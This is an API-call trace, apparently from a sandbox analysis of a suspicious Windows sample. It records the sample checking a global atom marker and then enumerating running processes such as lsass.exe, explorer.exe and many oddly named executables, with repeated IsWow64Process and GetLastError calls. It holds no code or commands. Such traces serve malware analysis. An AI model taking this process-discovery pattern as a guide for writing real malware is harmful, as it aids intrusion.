	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.161] GetLastError () returned 0x5
	[0127.162] GetLastError () returned 0x5
	[0127.162] GetLastError () returned 0x5
	[0127.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.162] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0127.162] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0127.162] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0127.162] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0127.162] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0127.162] CloseHandle (hObject=0x2dc) returned 1
	[0127.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0127.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.163] CloseHandle (hObject=0x2dc) returned 1
	[0127.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d668, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.163] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.163] CloseHandle (hObject=0x2dc) returned 1
	[0127.163] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.164] CloseHandle (hObject=0x2dc) returned 1
	[0127.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.164] CloseHandle (hObject=0x2dc) returned 1
	[0127.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0127.164] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.164] CloseHandle (hObject=0x2dc) returned 1
	[0127.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5bb0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0127.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5c10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5c10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.201] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.201] CloseHandle (hObject=0x2dc) returned 1
	[0127.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5b98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.202] CloseHandle (hObject=0x2dc) returned 1
	[0127.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d188, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0127.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.202] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.202] CloseHandle (hObject=0x2dc) returned 1
	[0127.202] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5b98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.203] CloseHandle (hObject=0x2dc) returned 1
	[0127.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.203] CloseHandle (hObject=0x2dc) returned 1
	[0127.203] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.203] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.203] CloseHandle (hObject=0x2dc) returned 1
	[0127.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.204] CloseHandle (hObject=0x2dc) returned 1
	[0127.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.204] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.204] CloseHandle (hObject=0x2dc) returned 1
	[0127.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.205] CloseHandle (hObject=0x2dc) returned 1
	[0127.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.205] CloseHandle (hObject=0x2dc) returned 1
	[0127.205] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.205] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.205] CloseHandle (hObject=0x2dc) returned 1
	[0127.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.206] CloseHandle (hObject=0x2dc) returned 1
	[0127.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0127.206] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.206] CloseHandle (hObject=0x2dc) returned 1
	[0127.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0127.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.207] CloseHandle (hObject=0x2dc) returned 1
	[0127.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b9708, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0127.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.207] CloseHandle (hObject=0x2dc) returned 1
	[0127.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d188, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.207] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.207] CloseHandle (hObject=0x2dc) returned 1
	[0127.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0127.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.208] CloseHandle (hObject=0x2dc) returned 1
	[0127.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b59e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0127.208] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.208] CloseHandle (hObject=0x2dc) returned 1
	[0127.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0127.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.209] CloseHandle (hObject=0x2dc) returned 1
	[0127.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0127.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.209] CloseHandle (hObject=0x2dc) returned 1
	[0127.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b80, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.209] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.209] CloseHandle (hObject=0x2dc) returned 1
	[0127.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5b80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0127.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.210] CloseHandle (hObject=0x2dc) returned 1
	[0127.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9938, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0127.210] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.210] CloseHandle (hObject=0x2dc) returned 1
	[0127.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.211] CloseHandle (hObject=0x2dc) returned 1
	[0127.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5a78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0127.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.211] CloseHandle (hObject=0x2dc) returned 1
	[0127.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0127.211] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.211] CloseHandle (hObject=0x2dc) returned 1
	[0127.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0127.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.212] CloseHandle (hObject=0x2dc) returned 1
	[0127.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0127.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.212] CloseHandle (hObject=0x2dc) returned 1
	[0127.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0127.212] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.212] CloseHandle (hObject=0x2dc) returned 1
	[0127.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0127.213] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0127.213] CloseHandle (hObject=0x2dc) returned 1
	[0127.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.213] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
	[0127.214] GetLastError () returned 0x5
